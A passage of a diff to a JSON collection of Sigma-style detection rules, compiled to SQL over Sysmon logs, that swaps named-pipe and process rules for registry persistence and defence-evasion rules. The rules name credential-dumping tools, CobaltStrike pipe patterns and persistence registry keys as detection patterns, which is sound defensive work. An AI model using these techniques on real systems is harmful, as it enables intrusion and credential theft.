LIKE '%\\\\ADExplorer64.exe' ESCAPE '\\')))" ], - "filename": "proc_creation_win_schtasks_one_time_only_midnight_task.yml" + "filename": "registry_set_renamed_sysinternals_eula_accepted.yml" }, { - "title": "7Zip Compressing Dump Files", - "id": "ec570e53-4c76-45a9-804d-dc3f355ff7a7", + "title": "Potential Persistence Via LSA Extensions", + "id": "41f6531d-af6e-4c6e-918f-b946f2b85a36", "status": "experimental", - "description": "Detects a suspicious 7zip execution that involves a file with a \".dmp\"/\".dump\" extension, which could be a step in a process of dump file exfiltration", + "description": "Detects when an attacker modifies the \"REG_MULTI_SZ\" value named \"Extensions\" to include a custom DLL to achieve persistence via lsass.\nThe \"Extensions\" list contains filenames of DLLs being automatically loaded by lsass.exe. Each DLL has its InitializeLsaExtension() method called after loading.\n", "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.collection", - "attack.t1560.001" + "attack.persistence" ], "falsepositives": [ - "Unknown" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Description LIKE '%7-Zip%' ESCAPE '\\' OR (Image LIKE '%\\\\7z.exe' ESCAPE '\\' OR Image LIKE '%\\\\7zr.exe' ESCAPE '\\' OR Image LIKE '%\\\\7za.exe' ESCAPE '\\') OR OriginalFileName IN ('7z.exe', '7za.exe')) AND (CommandLine LIKE '%.dmp%' ESCAPE '\\' OR CommandLine LIKE '%.dump%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'SetValue' AND TargetObject LIKE '%\\\\SYSTEM\\\\CurrentControlSet\\\\Control\\\\LsaExtensionConfig\\\\LsaSrv\\\\Extensions%' ESCAPE '\\')" ], - "filename": "proc_creation_win_7zip_exfil_dmp_files.yml" + "filename": "registry_set_persistence_lsa_extension.yml" }, { - "title": "MMC20 Lateral Movement", - "id": "f1f3bf22-deb2-418d-8cce-e1a45e46a5bd", - "status": "test", - "description": "Detects MMC20.Application Lateral Movement; specifically looks for the spawning of the parent MMC.exe with a command line of \"-Embedding\" as a child of svchost.exe", - "author": "@2xxeformyshirt (Security Risk Advisors) - rule; Teymur Kheirkhabarov (idea)", + "title": "Change the Fax Dll", + "id": "9e3357ba-09d4-4fbd-a7c5-ad6386314513", + "status": "experimental", + "description": "Detect possible persistence using Fax DLL load when service restart", + "author": "frack113", "tags": [ - "attack.execution", - "attack.t1021.003" + "attack.defense_evasion", + "attack.t1112" ], "falsepositives": [ - "Unlikely" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND ParentImage LIKE '%\\\\svchost.exe' ESCAPE '\\' AND Image LIKE '%\\\\mmc.exe' ESCAPE '\\' AND CommandLine LIKE '%-Embedding%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (TargetObject LIKE '%\\\\Software\\\\Microsoft\\\\Fax\\\\Device Providers\\\\%' ESCAPE '\\' AND TargetObject LIKE '%\\\\ImageName%' ESCAPE '\\') AND NOT (Details LIKE '\\%systemroot\\%\\\\system32\\\\fxst30.dll' ESCAPE '\\'))" ], - "filename": "proc_creation_win_mmc_mmc20_lateral_movement.yml" + "filename": "registry_set_fax_dll_persistance.yml" }, { - "title": "Suspicious Svchost Process", - "id": "01d2e2a1-5f09-44f7-9fc1-24faa7479b6d", + "title": "Potential Persistence Via MyComputer Registry Keys", + "id": "8fbe98a8-8f9d-44f8-aa71-8c572e29ef06", "status": "experimental", - "description": "Detects a suspicious svchost process start", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects modification to the \"Default\" value of the \"MyComputer\" key and subkeys to point to a custom binary that will be launched whenever the associated action is executed (see reference section for example)", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1036.005" + "attack.persistence" ], "falsepositives": [ - "Unknown" + "Unlikely but if you experience FPs add specific processes and locations you would like to monitor for" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND Image LIKE '%\\\\svchost.exe' ESCAPE '\\' AND NOT (((ParentImage LIKE '%\\\\services.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\MsMpEng.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\Mrt.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\rpcnet.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\ngen.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\TiWorker.exe' ESCAPE '\\')) OR (ParentImage = '') OR (ParentImage = '') OR (ParentImage = '-')))" + "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'SetValue' AND TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Explorer\\\\MyComputer%' ESCAPE '\\' AND TargetObject LIKE '%(Default)' ESCAPE '\\')" ], - "filename": "proc_creation_win_svchost_susp_parent_process.yml" + "filename": "registry_set_persistence_mycomputer.yml" }, { - "title": "Renamed ZOHO Dctask64 Execution", - "id": "340a090b-c4e9-412e-bb36-b4b16fe96f9b", - "status": "test", - "description": "Detects a renamed dctask64.exe used for process injection, command execution, process creation with a signed binary by ZOHO Corporation", + "title": "Disabled Windows Defender Eventlog", + "id": "fcddca7c-b9c0-4ddf-98da-e1e2d18b0157", + "status": "experimental", + "description": "Detects the disabling of the Windows Defender eventlog as seen in relation to Lockbit 3.0 infections", "author": "Florian Roth (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.t1036", - "attack.t1055.001", - "attack.t1202", - "attack.t1218" + "attack.t1562.001" ], "falsepositives": [ - "Unknown yet" + "Other Antivirus software installations could cause Windows to disable that eventlog (unknown)" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND Hashes LIKE '%6834B1B94E49701D77CCB3C0895E1AFD%' ESCAPE '\\' AND NOT (Image LIKE '%\\\\dctask64.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'SetValue' AND TargetObject LIKE '%\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\WINEVT\\\\Channels\\\\Microsoft-Windows-Windows Defender/Operational\\\\Enabled%' ESCAPE '\\' AND Details = 'DWORD (0x00000000)')" ], - "filename": "proc_creation_win_renamed_dctask64.yml" + "filename": "registry_set_disabled_microsoft_defender_eventlog.yml" }, { - "title": "HAFNIUM Exchange Exploitation Activity", - "id": "bbb2dedd-a0e3-46ab-ba6c-6c82ae7a9aa7", - "status": "test", - "description": "Detects activity observed by different researchers to be HAFNIUM group activity (or related) on Exchange servers", - "author": "Florian Roth (Nextron Systems)", + "title": "Lolbas OneDriveStandaloneUpdater.exe Proxy Download", + "id": "3aff0be0-7802-4a7e-a4fa-c60c74bc5e1d", + "status": "experimental", + "description": "Detects setting a custom URL for OneDriveStandaloneUpdater.exe to download a file from the Internet without executing any\nanomalous executables with suspicious arguments. The downloaded file will be in C:\\Users\\redacted\\AppData\\Local\\Microsoft\\OneDrive\\StandaloneUpdaterreSignInSettingsConfig.json\n", + "author": "frack113", "tags": [ - "attack.persistence", - "attack.t1546", - "attack.t1053" + "attack.command_and_control", + "attack.t1105" ], "falsepositives": [ - "Unlikely" + "Unknown" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((CommandLine LIKE '%attrib%' ESCAPE '\\' AND CommandLine LIKE '% +h %' ESCAPE '\\' AND CommandLine LIKE '% +s %' ESCAPE '\\' AND CommandLine LIKE '% +r %' ESCAPE '\\' AND CommandLine LIKE '%.aspx%' ESCAPE '\\') OR (Image LIKE '%\\\\ProgramData\\\\VSPerfMon\\\\%' ESCAPE '\\' OR (CommandLine LIKE '%schtasks%' ESCAPE '\\' AND CommandLine LIKE '%VSPerfMon%' ESCAPE '\\')) OR (Image LIKE '%Opera\\_browser.exe' ESCAPE '\\' AND (ParentImage LIKE '%\\\\services.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\svchost.exe' ESCAPE '\\')) OR Image LIKE '%Users\\\\Public\\\\opera\\\\Opera\\_browser.exe' ESCAPE '\\' OR (CommandLine LIKE '%vssadmin list shadows%' ESCAPE '\\' AND CommandLine LIKE '%Temp\\\\\\_\\_output%' ESCAPE '\\') OR (Image LIKE '%\\\\makecab.exe' ESCAPE '\\' AND CommandLine LIKE '%inetpub\\\\wwwroot\\\\%' ESCAPE '\\' AND CommandLine LIKE '%.dmp.zip%' ESCAPE '\\') OR (Image LIKE '%\\\\makecab.exe' ESCAPE '\\' AND (CommandLine LIKE '%Microsoft\\\\Exchange Server\\\\%' ESCAPE '\\' OR CommandLine LIKE '%compressionmemory%' ESCAPE '\\' OR CommandLine LIKE '%.gif%' ESCAPE '\\')) OR (CommandLine LIKE '% -t7z %' ESCAPE '\\' AND CommandLine LIKE '%C:\\\\Programdata\\\\pst%' ESCAPE '\\' AND CommandLine LIKE '%\\\\it.zip%' ESCAPE '\\') OR (CommandLine LIKE '%\\\\comsvcs.dll%' ESCAPE '\\' AND CommandLine LIKE '%Minidump%' ESCAPE '\\' AND CommandLine LIKE '%full %' ESCAPE '\\' AND CommandLine LIKE '%\\\\inetpub\\\\wwwroot%' ESCAPE '\\') OR (CommandLine LIKE '%Windows\\\\Temp\\\\xx.bat%' ESCAPE '\\' OR CommandLine LIKE '%Windows\\\\WwanSvcdcs%' ESCAPE '\\' OR CommandLine LIKE '%Windows\\\\Temp\\\\cw.exe%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'SetValue' AND TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\OneDrive\\\\UpdateOfficeConfig\\\\UpdateRingSettingURLFromOC%' ESCAPE '\\')" ], - "filename": "proc_creation_win_apt_hafnium.yml" + "filename": "registry_set_lolbin_onedrivestandaloneupdater.yml" }, { - "title": "Suspicious JavaScript Execution Via Mshta.EXE", - "id": "67f113fa-e23d-4271-befa-30113b3e08b1", - "status": "test", - "description": "Detects execution of javascript code using \"mshta.exe\".", - "author": "E.M. Anhaus (originally from Atomic Blue Detections, Endgame), oscd.community", + "title": "Potential Persistence Via App Paths Default Property", + "id": "707e097c-e20f-4f67-8807-1f72ff4500d6", + "status": "experimental", + "description": "Detects changes to the \"Default\" property for keys located in the \\Software\\Microsoft\\Windows\\CurrentVersion\\App Paths\\ registry. Which might be used as a method of persistence\nThe entries found under App Paths are used primarily for the following purposes.\nFirst, to map an application's executable file name to that file's fully qualified path.\nSecond, to pre-pend information to the PATH environment variable on a per-application, per-process basis.\n", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1218.005" + "attack.persistence", + "attack.t1546.012" ], "falsepositives": [ - "Unknown" + "Legitimate applications registering their binary from on of the suspicious locations mentioned above (tune it)" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\mshta.exe' ESCAPE '\\' OR OriginalFileName = 'MSHTA.EXE') AND CommandLine LIKE '%javascript%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'SetValue' AND TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\App Paths%' ESCAPE '\\' AND (TargetObject LIKE '%(Default)' ESCAPE '\\' OR TargetObject LIKE '%Path' ESCAPE '\\') AND (Details LIKE '%\\\\Users\\\\Public%' ESCAPE '\\' OR Details LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' OR Details LIKE '%\\\\Windows\\\\Temp\\\\%' ESCAPE '\\' OR Details LIKE '%\\\\Desktop\\\\%' ESCAPE '\\' OR Details LIKE '%\\\\Downloads\\\\%' ESCAPE '\\' OR Details LIKE '%\\%temp\\%%' ESCAPE '\\' OR Details LIKE '%\\%tmp\\%%' ESCAPE '\\' OR Details LIKE '%iex%' ESCAPE '\\' OR Details LIKE '%Invoke-%' ESCAPE '\\' OR Details LIKE '%rundll32%' ESCAPE '\\' OR Details LIKE '%regsvr32%' ESCAPE '\\' OR Details LIKE '%mshta%' ESCAPE '\\' OR Details LIKE '%cscript%' ESCAPE '\\' OR Details LIKE '%wscript%' ESCAPE '\\' OR Details LIKE '%.bat%' ESCAPE '\\' OR Details LIKE '%.hta%' ESCAPE '\\' OR Details LIKE '%.dll%' ESCAPE '\\' OR Details LIKE '%.ps1%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_mshta_javascript.yml" + "filename": "registry_set_persistence_app_paths.yml" }, { - "title": "Malicious Named Pipe", - "id": "fe3ac066-98bb-432a-b1e7-a5229cb39d4a", - "status": "test", - "description": "Detects the creation of a named pipe used by known APT malware", - "author": "Florian Roth (Nextron Systems), blueteam0ps, elhoim", + "title": "Potential AutoLogger Sessions Tampering", + "id": "f37b4bce-49d0-4087-9f5b-58bffda77316", + "status": "experimental", + "description": "Detects tampering with autologger trace sessions which is a technique used by attackers to disable logging", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1055" + "attack.defense_evasion" ], "falsepositives": [ "Unknown" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID IN ('17', '18') AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (PipeName LIKE '\\\\isapi\\_http' ESCAPE '\\' OR PipeName LIKE '\\\\isapi\\_dg' ESCAPE '\\' OR PipeName LIKE '\\\\isapi\\_dg2' ESCAPE '\\' OR PipeName LIKE '\\\\sdlrpc' ESCAPE '\\' OR PipeName LIKE '\\\\ahexec' ESCAPE '\\' OR PipeName LIKE '\\\\winsession' ESCAPE '\\' OR PipeName LIKE '\\\\lsassw' ESCAPE '\\' OR PipeName LIKE '\\\\46a676ab7f179e511e30dd2dc41bd388' ESCAPE '\\' OR PipeName LIKE '\\\\9f81f59bc58452127884ce513865ed20' ESCAPE '\\' OR PipeName LIKE '\\\\e710f28d59aa529d6792ca6ff0ca1b34' ESCAPE '\\' OR PipeName LIKE '\\\\rpchlp\\_3' ESCAPE '\\' OR PipeName LIKE '\\\\NamePipe\\_MoreWindows' ESCAPE '\\' OR PipeName LIKE '\\\\pcheap\\_reuse' ESCAPE '\\' OR PipeName LIKE '\\\\gruntsvc' ESCAPE '\\' OR PipeName LIKE '\\\\583da945-62af-10e8-4902-a8f205c72b2e' ESCAPE '\\' OR PipeName LIKE '\\\\bizkaz' ESCAPE '\\' OR PipeName LIKE '\\\\svcctl' ESCAPE '\\' OR PipeName LIKE '\\\\Posh%' ESCAPE '\\' OR PipeName LIKE '\\\\jaccdpqnvbrrxlaf' ESCAPE '\\' OR PipeName LIKE '\\\\csexecsvc' ESCAPE '\\' OR PipeName LIKE '\\\\6e7645c4-32c5-4fe3-aabf-e94c2f4370e7' ESCAPE '\\' OR PipeName LIKE '\\\\adschemerpc' ESCAPE '\\' OR PipeName LIKE '\\\\AnonymousPipe' ESCAPE '\\' OR PipeName LIKE '\\\\bc367' ESCAPE '\\' OR PipeName LIKE '\\\\bc31a7' ESCAPE '\\' OR PipeName LIKE '\\\\testPipe' ESCAPE '\\' OR PipeName LIKE '\\\\dce\\_3d' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (EventType = 'SetValue' AND TargetObject LIKE '%\\\\System\\\\CurrentControlSet\\\\Control\\\\WMI\\\\Autologger\\\\%' ESCAPE '\\' AND (TargetObject LIKE '%\\\\EventLog-%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Defender%' ESCAPE '\\') AND (TargetObject LIKE '%\\\\Enable' ESCAPE '\\' OR TargetObject LIKE '%\\\\Start' ESCAPE '\\') AND Details = 'DWORD (0x00000000)') AND NOT ((Image LIKE 'C:\\\\Windows\\\\system32\\\\wevtutil.exe' ESCAPE '\\')))" ], - "filename": "pipe_created_mal_namedpipes.yml" + "filename": "registry_set_disable_autologger_sessions.yml" }, { - "title": "Cred Dump-Tools Named Pipes", - "id": "961d0ba2-3eea-4303-a930-2cf78bbfcc5e", + "title": "Registry Persistence via Explorer Run Key", + "id": "b7916c2a-fa2f-4795-9477-32b731f70f11", "status": "test", - "description": "Detects well-known credential dumping tools execution via specific named pipes", - "author": "Teymur Kheirkhabarov, oscd.community", + "description": "Detects a possible persistence mechanism using RUN key for Windows Explorer and pointing to a suspicious folder", + "author": "Florian Roth (Nextron Systems), oscd.community", "tags": [ - "attack.credential_access", - "attack.t1003.001", - "attack.t1003.002", - "attack.t1003.004", - "attack.t1003.005" + "attack.persistence", + "attack.t1547.001" ], "falsepositives": [ - "Legitimate Administrator using tool for password recovery" + "Unknown" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID IN ('17', '18') AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (PipeName LIKE '%\\\\lsadump%' ESCAPE '\\' OR PipeName LIKE '%\\\\cachedump%' ESCAPE '\\' OR PipeName LIKE '%\\\\wceservicepipe%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (EventType = 'SetValue' AND TargetObject LIKE '%\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\Explorer\\\\Run' ESCAPE '\\') AND ((Details LIKE 'C:\\\\Windows\\\\Temp\\\\%' ESCAPE '\\' OR Details LIKE 'C:\\\\ProgramData\\\\%' ESCAPE '\\' OR Details LIKE 'C:\\\\$Recycle.bin\\\\%' ESCAPE '\\' OR Details LIKE 'C:\\\\Temp\\\\%' ESCAPE '\\' OR Details LIKE 'C:\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR Details LIKE 'C:\\\\Users\\\\Default\\\\%' ESCAPE '\\') OR Details LIKE '%\\\\AppData\\\\%' ESCAPE '\\'))" ], - "filename": "pipe_created_cred_dump_tools_named_pipes.yml" + "filename": "registry_set_susp_reg_persist_explorer_run.yml" }, { - "title": "Koh Default Named Pipes", - "id": "0adc67e0-a68f-4ffd-9c43-28905aad5d6a", + "title": "Office Security Settings Changed", + "id": "a166f74e-bf44-409d-b9ba-ea4b2dd8b3cd", "status": "experimental", - "description": "Detects creation of default named pipes used by the Koh tool", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects registry changes to Office macro settings. The TrustRecords contain information on executed macro-enabled documents. (see references)", + "author": "Trent Liffick (@tliffick)", "tags": [ - "attack.privilege_escalation", - "attack.credential_access", - "attack.t1528", - "attack.t1134.001" + "attack.defense_evasion", + "attack.t1112" ], "falsepositives": [ - "Unlikely" + "Valid Macros and/or internal documents" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID IN ('17', '18') AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (PipeName LIKE '%\\\\imposecost%' ESCAPE '\\' OR PipeName LIKE '%\\\\imposingcost%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'Setvalue' AND (TargetObject LIKE '%\\\\Security\\\\Trusted Documents\\\\TrustRecords' ESCAPE '\\' OR TargetObject LIKE '%\\\\Security\\\\AccessVBOM' ESCAPE '\\' OR TargetObject LIKE '%\\\\Security\\\\VBAWarnings' ESCAPE '\\'))" ], - "filename": "pipe_created_koh_default_pipe.yml" + "filename": "registry_set_office_security.yml" }, { - "title": "ADFS Database Named Pipe Connection", - "id": "1ea13e8c-03ea-409b-877d-ce5c3d2c1cb3", - "status": "test", - "description": "Detects suspicious local connections via a named pipe to the AD FS configuration database (Windows Internal Database).\nUsed to access information such as the AD FS configuration settings which contains sensitive information used to sign SAML tokens.\n", - "author": "Roberto Rodriguez @Cyb3rWard0g", + "title": "Set TimeProviders DllName", + "id": "e88a6ddc-74f7-463b-9b26-f69fc0d2ce85", + "status": "experimental", + "description": "Detects processes setting a new DLL in DllName in under HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Services\\W32Time\\TimeProvider.\nAdversaries may abuse time providers to execute DLLs when the system boots.\nThe Windows Time service (W32Time) enables time synchronization across and within domains.\n", + "author": "frack113", "tags": [ - "attack.collection", - "attack.t1005" + "attack.persistence", + "attack.privilege_escalation", + "attack.t1547.003" ], "falsepositives": [ - "Processes in the filter condition" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID IN ('17', '18') AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND PipeName LIKE '\\\\MICROSOFT##WID\\\\tsql\\\\query' ESCAPE '\\' AND NOT ((Image LIKE '%\\\\Microsoft.IdentityServer.ServiceHost.exe' ESCAPE '\\' OR Image LIKE '%\\\\Microsoft.Identity.Health.Adfs.PshSurrogate.exe' ESCAPE '\\' OR Image LIKE '%\\\\AzureADConnect.exe' ESCAPE '\\' OR Image LIKE '%\\\\Microsoft.Tri.Sensor.exe' ESCAPE '\\' OR Image LIKE '%\\\\wsmprovhost.exe' ESCAPE '\\' OR Image LIKE '%\\\\mmc.exe' ESCAPE '\\' OR Image LIKE '%\\\\sqlservr.exe' ESCAPE '\\' OR Image LIKE '%\\\\tssdis.exe' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (EventType = 'SetValue' AND TargetObject LIKE 'HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\W32Time\\\\TimeProviders%' ESCAPE '\\' AND TargetObject LIKE '%DllName' ESCAPE '\\') AND NOT (Details LIKE 'C:\\\\Windows\\\\SYSTEM32\\\\w32time.DLL' ESCAPE '\\'))" ], - "filename": "pipe_created_susp_adfs_namedpipe_connection.yml" + "filename": "registry_set_timeproviders_dllname.yml" }, { - "title": "EfsPotato Named Pipe", - "id": "637f689e-b4a5-4a86-be0e-0100a0a33ba2", + "title": "NET NGenAssemblyUsageLog Registry Key Tamper", + "id": "28036918-04d3-423d-91c0-55ecf99fb892", "status": "experimental", - "description": "Detects the pattern of a pipe name as used by the tool EfsPotato", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects changes to the NGenAssemblyUsageLog registry key.\n.NET Usage Log output location can be controlled by setting the NGenAssemblyUsageLog CLR configuration knob in the Registry or by configuring an environment variable (as described in the next section).\nBy simplify specifying an arbitrary value (e.g. fake output location or junk data) for the expected value, a Usage Log file for the .NET execution context will not be created.\n", + "author": "frack113", "tags": [ "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1055" + "attack.t1112" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID IN ('17', '18') AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (PipeName LIKE '%\\\\pipe\\\\%' ESCAPE '\\' OR PipeName LIKE '%\\\\pipe\\\\srvsvc%' ESCAPE '\\') AND NOT (PipeName LIKE '%\\\\CtxShare%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'SetValue' AND TargetObject LIKE '%SOFTWARE\\\\Microsoft\\\\.NETFramework\\\\NGenAssemblyUsageLog' ESCAPE '\\')" ], - "filename": "pipe_created_efspotato_namedpipe.yml" + "filename": "registry_set_net_cli_ngenassemblyusagelog.yml" }, { - "title": "CobaltStrike Named Pipe Patterns", - "id": "85adeb13-4fc9-4e68-8a4a-c7cb2c336eb7", + "title": "Enabling COR Profiler Environment Variables", + "id": "ad89044a-8f49-4673-9a55-cbd88a1b374f", "status": "test", - "description": "Detects the creation of a named pipe with a pattern found in CobaltStrike malleable C2 profiles", - "author": "Florian Roth (Nextron Systems), Christian Burkard (Nextron Systems)", + "description": "This rule detects cor_enable_profiling and cor_profiler environment variables being set and configured.", + "author": "Jose Rodriguez (@Cyb3rPandaH), OTR (Open Threat Research)", "tags": [ - "attack.defense_evasion", + "attack.persistence", "attack.privilege_escalation", - "attack.t1055" + "attack.defense_evasion", + "attack.t1574.012" + ], + "level": "high", + "rule": [ + "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'Setvalue' AND (TargetObject LIKE '%\\\\COR\\_ENABLE\\_PROFILING' ESCAPE '\\' OR TargetObject LIKE '%\\\\COR\\_PROFILER' ESCAPE '\\'))" + ], + "filename": "registry_set_enabling_cor_profiler_env_variables.yml" + }, + { + "title": "Potential Attachment Manager Settings Attachments Tamper", + "id": "ee77a5db-b0f3-4be2-bfd4-b58be1c6b15a", + "status": "experimental", + "description": "Detects tampering with attachment manager settings policies attachments (See reference for more information)", + "author": "Nasreddine Bencherchali (Nextron Systems)", + "tags": [ + "attack.defense_evasion" ], "falsepositives": [ - "Chrome instances using the exact same pipe name \"mojo.something\"" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID IN ('17', '18') AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (((PipeName LIKE '\\\\mojo.5688.8052.183894939787088877%' ESCAPE '\\' OR PipeName LIKE '\\\\mojo.5688.8052.35780273329370473%' ESCAPE '\\' OR PipeName LIKE '\\\\mypipe-f%' ESCAPE '\\' OR PipeName LIKE '\\\\mypipe-h%' ESCAPE '\\' OR PipeName LIKE '\\\\ntsvcs%' ESCAPE '\\' OR PipeName LIKE '\\\\scerpc%' ESCAPE '\\' OR PipeName LIKE '\\\\win\\_svc%' ESCAPE '\\' OR PipeName LIKE '\\\\spoolss%' ESCAPE '\\' OR PipeName LIKE '\\\\msrpc\\_%' ESCAPE '\\' OR PipeName LIKE '\\\\win\\\\msrpc\\_%' ESCAPE '\\' OR PipeName LIKE '\\\\wkssvc%' ESCAPE '\\' OR PipeName LIKE '\\\\f53f%' ESCAPE '\\' OR PipeName LIKE '\\\\windows.update.manager%' ESCAPE '\\' OR PipeName LIKE '\\\\SearchTextHarvester%' ESCAPE '\\' OR PipeName LIKE '\\\\DserNamePipe%' ESCAPE '\\' OR PipeName LIKE '\\\\PGMessagePipe%' ESCAPE '\\' OR PipeName LIKE '\\\\MsFteWds%' ESCAPE '\\' OR PipeName LIKE '\\\\f4c3%' ESCAPE '\\' OR PipeName LIKE '\\\\fullduplex\\_%' ESCAPE '\\' OR PipeName LIKE '\\\\rpc\\_%' ESCAPE '\\') OR (PipeName LIKE '\\\\demoagent\\_11' ESCAPE '\\' OR PipeName LIKE '\\\\demoagent\\_22' ESCAPE '\\')) OR (PipeName LIKE '\\\\Winsock2\\\\CatalogChangeListener-%' ESCAPE '\\' AND PipeName LIKE '%-0,' ESCAPE '\\')) AND NOT ((PipeName LIKE '\\\\wkssvc' ESCAPE '\\' OR PipeName LIKE '\\\\spoolss' ESCAPE '\\' OR PipeName LIKE '\\\\scerpc' ESCAPE '\\' OR PipeName LIKE '\\\\ntsvcs' ESCAPE '\\' OR PipeName LIKE '\\\\SearchTextHarvester' ESCAPE '\\' OR PipeName LIKE '\\\\PGMessagePipe' ESCAPE '\\' OR PipeName LIKE '\\\\MsFteWds' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (EventType = 'SetValue' AND TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\Attachments\\\\%' ESCAPE '\\') AND ((TargetObject LIKE '%\\\\HideZoneInfoOnProperties' ESCAPE '\\' AND Details = 'DWORD (0x00000001)') OR (TargetObject LIKE '%\\\\SaveZoneInformation' ESCAPE '\\' AND Details = 'DWORD (0x00000002)') OR (TargetObject LIKE '%\\\\ScanWithAntiVirus' ESCAPE '\\' AND Details = 'DWORD (0x00000001)')))" ], - "filename": "pipe_created_susp_cobaltstrike_pipe_patterns.yml" + "filename": "registry_set_policies_attachments_tamper.yml" }, { - "title": "PsExec Tool Execution From Suspicious Locations - PipeName", - "id": "41504465-5e3a-4a5b-a5b4-2a0baadd4463", + "title": "Potential Persistence Via DLLPathOverride", + "id": "a1b1fd53-9c4a-444c-bae0-34a330fc7aa8", "status": "experimental", - "description": "Detects PsExec default pipe creation where the image executed is located in a suspicious location. Which could indicate that the tool is being used in an attack", + "description": "Detects when an attacker adds a new \"DLLPathOverride\" value to the \"Natural Language\" key in order to achieve persistence which will get invoked by \"SearchIndexer.exe\" process", "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.execution", - "attack.t1569.002", - "attack.s0029" + "attack.persistence" ], "falsepositives": [ - "Rare legitimate use of psexec from the locations mentioned above" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID IN ('17', '18') AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND PipeName LIKE '\\\\PSEXESVC' ESCAPE '\\' AND (Image LIKE '%C:\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\Desktop\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\Downloads\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' 